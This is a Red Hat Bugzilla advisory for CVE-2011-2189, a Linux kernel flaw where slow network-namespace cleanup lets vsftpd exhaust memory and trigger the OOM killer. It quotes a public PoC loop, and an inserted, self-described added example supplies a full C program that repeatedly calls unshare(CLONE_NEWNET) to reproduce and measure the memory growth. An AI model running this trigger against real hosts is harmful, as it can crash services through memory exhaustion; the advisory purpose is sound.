Bug 711245 (CVE-2011-2189)

Summary: CVE-2011-2189 kernel: net_ns: oom killer fires because of slow net_ns cleanup
Product: [Other] Security Response
Reporter: Eugene Teo (Security Response) <eteo>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
CC: arozansk, bhu, dhoward, fhrbata, jkacur, kernel-mgr, kmcmartin, lgoncalv, lwang, mskinner, nobody, plougher, pmatouse, rkhan, rt-maint, sforsber, tcallawa, vgoyal, williams
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2015-07-29 12:48:46 UTC
Bug Depends On: 711246, 711247, 711248, 749061, 761354

Description Eugene Teo (Security Response) 2011-06-06 23:53:28 UTC
It was found that vsftpd, the Very Secure FTP daemon, when network namespace (CONFIG_NET_NS) support was activated in the kernel, created a new network namespace per connection. A remote attacker could use this flaw to cause memory pressure (causing the kernel OOM killer protection mechanism to be activated and potentially terminate vsftpd or an arbitrary [vsftpd-independent] process that satisfied the OOM killer process selection algorithm).

References:
[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629373
[2] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/720095

Public PoC (from [2]):
======================

The test is started in this way:

$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done

What is observed during the test is that /proc/vmallocinfo grows continually with lines like the following being added:

0xffffe8ffff800000-0xffffe8ffffa00000 2097152 pcpu_get_vm_areas+0x0/0x790 vmalloc
0xffffe8ffffa00000-0xffffe8ffffc00000 2097152 pcpu_get_vm_areas+0x0/0x790 vmalloc
0xffffe8ffffc00000-0xffffe8ffffe00000 2097152 pcpu_get_vm_areas+0x0/0x790 vmalloc

vsftpd bug: https://bugzilla.redhat.com/show_bug.cgi?id=711134

Proposed patches (but they have a connection-rate problem):
http://patchwork.ozlabs.org/patch/88217/

Comment 13 Eugene Teo (Security Response) 2011-10-26 01:20:57 UTC
Created kernel tracking bugs for this issue

Affects: fedora-all [bug 749061]

Comment 15 Eugene Teo (Security Response) 2011-10-30 12:35:47 UTC
This issue is rated 4.6/AV:L/AC:L/Au:S/C:N/I:N/A:C. AV is L instead of N because this is not a flaw in a network service. It can be triggered by any process that does namespace isolation. Au is S because to call clone(2) with CLONE_NEWNET, the process has to be privileged (CAP_SYS_ADMIN).

The current /known/ attack vector, vsftpd, does not affect us as it is explained here, https://bugzilla.redhat.com/show_bug.cgi?id=711134#c16.
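The two technical points above, the per-connection network namespace churn that the Ubuntu PoC drives through vsftpd and the CAP_SYS_ADMIN requirement behind the Au:S rating in comment 15, can be exercised directly without vsftpd. The following C program is an added example, not the Bugzilla report's, the Ubuntu PoC's or any vendor's code. It creates a burst of network namespaces with unshare(CLONE_NEWNET) (each call leaves the previous namespace for the kernel's deferred cleanup, which is the slow path this bug is about) and measures the bytes attributed to pcpu_get_vm_areas in /proc/vmallocinfo before and after, since those are the entries the PoC saw growing. The function names (vmalloc_bytes_for, churn_netns, read_vmallocinfo), the default count of 1000 and the parsing approach are this example's own assumptions; the sample line format matches the three vmallocinfo lines quoted in the description.

```c
/* Added example (not from the bug report or the Ubuntu PoC).
 * Build: cc -Wall -O2 netns_vmalloc.c -o netns_vmalloc
 * Run as root: both /proc/vmallocinfo (mode 0400) and unshare(CLONE_NEWNET)
 * (CAP_SYS_ADMIN) are privileged; an unprivileged run fails with EPERM,
 * which is exactly why comment 15 rates this Au:S. */
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Parse one /proc/vmallocinfo line: "0xSTART-0xEND SIZE CALLER+OFF/LEN flags..."
 * Returns SIZE when CALLER equals `caller`, 0 for other callers or malformed lines. */
static unsigned long vmallocinfo_line_bytes(const char *line, const char *caller)
{
    unsigned long start, end, size;
    char sym[128];

    if (sscanf(line, "0x%lx-0x%lx %lu %127s", &start, &end, &size, sym) != 4)
        return 0;
    if (end - start != size)          /* an entry always spans exactly SIZE bytes */
        return 0;
    size_t n = strlen(caller);
    if (strncmp(sym, caller, n) != 0)
        return 0;
    if (sym[n] != '\0' && sym[n] != '+') /* reject "pcpu_get_vm_areas_other" */
        return 0;
    return size;
}

/* Sum the bytes attributed to `caller` over a whole vmallocinfo dump held in memory. */
static unsigned long vmalloc_bytes_for(const char *dump, const char *caller)
{
    unsigned long total = 0;
    const char *p = dump;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        total += vmallocinfo_line_bytes(line, caller);
        if (!nl)
            break;
        p = nl + 1;
    }
    return total;
}

/* Read the live /proc/vmallocinfo into a malloc'ed, NUL-terminated buffer (NULL on error). */
static char *read_vmallocinfo(void)
{
    FILE *f = fopen("/proc/vmallocinfo", "r");
    if (!f)
        return NULL;
    size_t cap = 1 << 16, len = 0, n;
    char *buf = malloc(cap);
    if (!buf) { fclose(f); return NULL; }
    while ((n = fread(buf + len, 1, cap - len - 1, f)) > 0) {
        len += n;
        if (len + 1 >= cap) {
            char *nb = realloc(buf, cap * 2);
            if (!nb) { free(buf); fclose(f); return NULL; }
            buf = nb;
            cap *= 2;
        }
    }
    buf[len] = '\0';
    fclose(f);
    return buf;
}

/* Replace this process's network namespace `count` times in a row. Each call
 * drops our reference to the old namespace, queueing it for the kernel's
 * deferred cleanup; doing this faster than cleanup runs is the PoC's trigger.
 * Returns count on success, -1 with errno set (EPERM without CAP_SYS_ADMIN). */
static int churn_netns(int count)
{
    for (int i = 0; i < count; i++)
        if (unshare(CLONE_NEWNET) != 0)
            return -1;
    return count;
}

int main(int argc, char **argv)
{
    int count = argc > 1 ? atoi(argv[1]) : 1000;  /* assumed default burst size */
    const char *caller = "pcpu_get_vm_areas";

    char *before = read_vmallocinfo();
    if (!before) { perror("/proc/vmallocinfo (root required)"); return 1; }
    unsigned long b0 = vmalloc_bytes_for(before, caller);
    free(before);

    if (churn_netns(count) < 0) { perror("unshare(CLONE_NEWNET)"); return 1; }

    char *after = read_vmallocinfo();
    if (!after) { perror("/proc/vmallocinfo"); return 1; }
    unsigned long b1 = vmalloc_bytes_for(after, caller);
    free(after);

    printf("%s: %lu -> %lu bytes across %d unshare(CLONE_NEWNET) calls\n",
           caller, b0, b1, count);
    return 0;
}
```

Run it a few times in succession (or in parallel, as the PoC does with eight feedftp instances) and compare the printed figures: a total that keeps rising faster than it is released is the symptom the PoC describes. The same parser can be pointed at a saved copy of /proc/vmallocinfo from a production host as a cheap check for this kind of per-cpu growth, independent of which program is creating the namespaces.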

Comment 17 Eugene Teo (Security Response) 2011-11-11 04:53:02 UTC
[Updated: 2011-11-11]
 
Statement:

This did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 4 and 5, as they did not include support for network namespaces. A future kernel update in Red Hat Enterprise MRG may address this issue. The risks associated with fixing this flaw outweigh the benefits of the fix; therefore, Red Hat does not plan to fix this flaw in Red Hat Enterprise Linux 6.